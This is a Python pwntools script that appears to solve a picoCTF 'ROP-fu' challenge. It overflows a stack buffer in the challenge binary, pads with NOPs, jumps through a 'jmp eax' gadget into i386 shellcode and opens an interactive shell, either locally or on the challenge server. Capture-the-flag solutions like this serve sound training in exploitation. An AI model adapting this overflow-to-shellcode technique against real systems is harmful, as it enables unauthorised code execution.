44 lines
975 B
Python
Executable File
44 lines
975 B
Python
Executable File
#!/usr/bin/env nix-shell
|
|
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
|
|
|
|
from pwn import *
|
|
|
|
exe = ELF("./vuln")
|
|
|
|
context.binary = exe
|
|
|
|
ADDR, PORT, *_ = "saturn.picoctf.net 60930".split()
|
|
|
|
def conn():
|
|
if args.REMOTE:
|
|
r = remote(ADDR, PORT)
|
|
else:
|
|
r = process([exe.path])
|
|
return r
|
|
|
|
def main():
|
|
r = conn()
|
|
|
|
print(r.recvuntil(b"How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n"))
|
|
offset = 28 # found with pwndbg
|
|
|
|
rop = ROP(exe)
|
|
|
|
jmp_eax = asm('jmp $+0x6') # 2 for jmp + 4 for ret address
|
|
for _ in range(offset - len(jmp_eax)):
|
|
rop.raw(asm('nop'))
|
|
rop.raw(jmp_eax)
|
|
|
|
# NOTE: rop.find_gadget(['jmp eax'])[0] Does not work because it does not end with 'ret'
|
|
jmp_eax_gadget = next(exe.search(asm("jmp eax")))
|
|
rop.raw(jmp_eax_gadget)
|
|
|
|
rop.raw(asm(shellcraft.i386.linux.sh()))
|
|
|
|
r.sendline(rop.chain())
|
|
r.interactive()
|
|
r.close()
|
|
|
|
if __name__ == "__main__":
|
|
main()
|